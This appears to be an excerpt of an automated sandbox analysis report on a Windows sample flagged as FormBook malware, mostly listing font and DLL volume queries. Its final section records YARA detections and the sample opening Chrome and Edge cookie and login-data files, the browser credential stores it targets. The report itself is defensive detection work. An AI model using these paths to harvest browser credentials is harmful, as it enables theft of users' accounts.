                Source: wPGxKDFwovcH.exe, 00000006.00000000.1973380170.0000000001851000.00000002.00000001.00040000.00000000.sdmp, wPGxKDFwovcH.exe, 00000006.00000002.4134343556.0000000001850000.00000002.00000001.00040000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000000.2129425671.0000000001221000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: wPGxKDFwovcH.exe, 00000006.00000000.1973380170.0000000001851000.00000002.00000001.00040000.00000000.sdmp, wPGxKDFwovcH.exe, 00000006.00000002.4134343556.0000000001850000.00000002.00000001.00040000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000000.2129425671.0000000001221000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: wPGxKDFwovcH.exe, 00000006.00000000.1973380170.0000000001851000.00000002.00000001.00040000.00000000.sdmp, wPGxKDFwovcH.exe, 00000006.00000002.4134343556.0000000001850000.00000002.00000001.00040000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000000.2129425671.0000000001221000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: wPGxKDFwovcH.exe, 00000006.00000000.1973380170.0000000001851000.00000002.00000001.00040000.00000000.sdmp, wPGxKDFwovcH.exe, 00000006.00000002.4134343556.0000000001850000.00000002.00000001.00040000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000000.2129425671.0000000001221000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Users\user\Desktop\SDBARVe3d3.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.SDBARVe3d3.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.SDBARVe3d3.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4134715840.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2059073406.0000000003CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4136828393.0000000004FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4134941283.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4134736580.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2051531686.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
